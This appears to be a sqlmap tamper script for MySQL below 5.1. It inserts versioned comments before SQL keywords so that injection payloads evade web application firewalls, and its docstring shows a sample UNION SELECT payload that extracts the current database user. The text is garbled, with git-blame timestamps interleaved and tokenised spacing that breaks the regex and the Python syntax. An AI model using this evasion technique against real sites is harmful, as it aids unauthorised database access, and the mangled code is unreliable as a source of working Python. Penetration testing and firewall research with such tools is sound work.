2011-07-07 01:04:45 +04:00
#!/usr/bin/env python
"""
$ Id $
2012-07-12 21:38:03 +04:00
Copyright ( c ) 2006 - 2012 sqlmap developers ( http : / / sqlmap . org / )
2011-07-07 01:04:45 +04:00
See the file ' doc/COPYING ' for copying permission
"""
import os
import re
from lib . core . common import singleTimeWarnMessage
from lib . core . data import kb
from lib . core . enums import DBMS
from lib . core . enums import PRIORITY
from lib . core . settings import IGNORE_SPACE_AFFECTED_KEYWORDS
__priority__ = PRIORITY . HIGHER
def dependencies ( ) :
2011-07-08 17:43:34 +04:00
singleTimeWarnMessage ( " tamper script ' %s ' is only meant to be run against %s < 5.1 " % ( os . path . basename ( __file__ ) . split ( " . " ) [ 0 ] , DBMS . MYSQL ) )
2011-07-07 01:04:45 +04:00
def tamper ( payload ) :
"""
Adds versioned MySQL comment before each keyword
Example :
* Input : value ' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ' QDWa ' = ' QDWa
* Output : value ' /*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ' QDWa ' = ' QDWa
Requirement :
2011-07-08 17:43:34 +04:00
* MySQL < 5.1
2011-07-07 01:04:45 +04:00
Tested against :
2011-07-08 17:43:34 +04:00
* MySQL 4.0 .18 , 5.0 .22
2011-07-07 01:04:45 +04:00
Notes :
* Useful to bypass several web application firewalls when the
back - end database management system is MySQL
* Used during the ModSecurity SQL injection challenge ,
http : / / modsecurity . org / demo / challenge . html
"""
def process ( match ) :
word = match . group ( ' word ' )
if word . upper ( ) in kb . keywords and word . upper ( ) not in IGNORE_SPACE_AFFECTED_KEYWORDS :
return match . group ( ) . replace ( word , " /*!0 %s " % word )
else :
return match . group ( )
retVal = payload
if payload :
retVal = re . sub ( r " (?<= \ W)(?P<word>[A-Za-z_]+)(?= \ W| \ Z) " , lambda match : process ( match ) , retVal )
retVal = retVal . replace ( " /*!0 " , " /*!0 " )
return retVal